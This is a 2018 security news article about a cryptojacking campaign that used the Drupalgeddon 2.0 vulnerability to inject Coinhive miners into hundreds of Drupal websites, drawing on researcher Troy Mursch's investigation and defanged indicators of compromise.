Hundreds of websites running on the Drupal content management system – including those of the San Diego Zoo as well as the National Labor Relations Board – were targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.
The attacks, which have impacted 400+ government and university websites leverage the critical remote-code execution vulnerability (CVE-2018-7600) called Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in question has been patched for over a month.
“After the scan completed, the full scope of this cryptojacking campaign was established,” Troy Mursch wrote in a report posted Saturday. “Using the bulk scan feature of urlscan.io, it became clear that these were all sites were running outdated and vulnerable versions of Drupal content management system.”
This #cryptojacking outbreak started at the zoo and quickly spread to 400+ other sites.
— Bad Packets Report (@bad_packets) May 7, 2018
As of Tuesday Mr. Mursch said he has found more sites that were targeted by the attack, including that of Lenovo, UCLA, and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).
Sheet has been updated with additional sites. It’s not an exhaustive list and is subject to change as this #cryptojacking campaign is still ongoing.
— Bad Packets Report (@bad_packets) May 8, 2018
Troy Mursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload – however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive’s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.
That domain used to inject the malware was vuuwd[.]com, according to Troy Mursch. “Once the code was de-obfuscated, the reference to ‘http://vuuwd[.]com/t.js’ was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.”
The site key used, meanwhile, was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” Troy Mursch said he confirmed the key was still active by checking in Fiddler.
Mursch said that the miner was only slightly throttled so that it had a reduced impact on visitors’ CPUs and would be harder to detect.
Typically, cryptojacking attacks are not throttled and use 100% of the target’s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.
When trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that “it belongs to ‘X XYZ’ who lives on ‘joker joker’ street in China,” he explained in a Tweet. However, the email address that was used (firstname.lastname@example.org) provided a small hint as it was associated with other registered domains.
While the clearly fake WHOIS data may seem like a dead end, the same email address (email@example.com) was used to register five other domains. It’s likely you’d find malicious activity tied to these as well. One of the domains references less-fake information. pic.twitter.com/IEeqXrAKTT
— Bad Packets Report (@bad_packets) May 4, 2018
The domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: “While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,” he said.
Drupalgeddon 2.0, which has been patched for over a month now and impacts versions 6,7, and 8 of Drupal’s CMS platform, “potentially allows attackers to exploit several attack vectors on a Drupal site, which could result in the site being completely compromised,” according to MITRE’s Common Vulnerabilities & Exposures bulletin back on March 28.
Since Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up – including a recent attack, leveraging the “Kitty” cryptomining malware, which cashed in on the vulnerable Drupal websites.
Beyond the Kitty malware, researchers have found a botnet, dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems.
More recently, attackers behind a ransomware attack hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.
“We’ve seen many examples of Drupalgeddon 2 being exploited in the past few weeks,” said Troy Mursch in the report. “This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a site operator using Drupal’s content management system, you need to update to the latest available version ASAP.”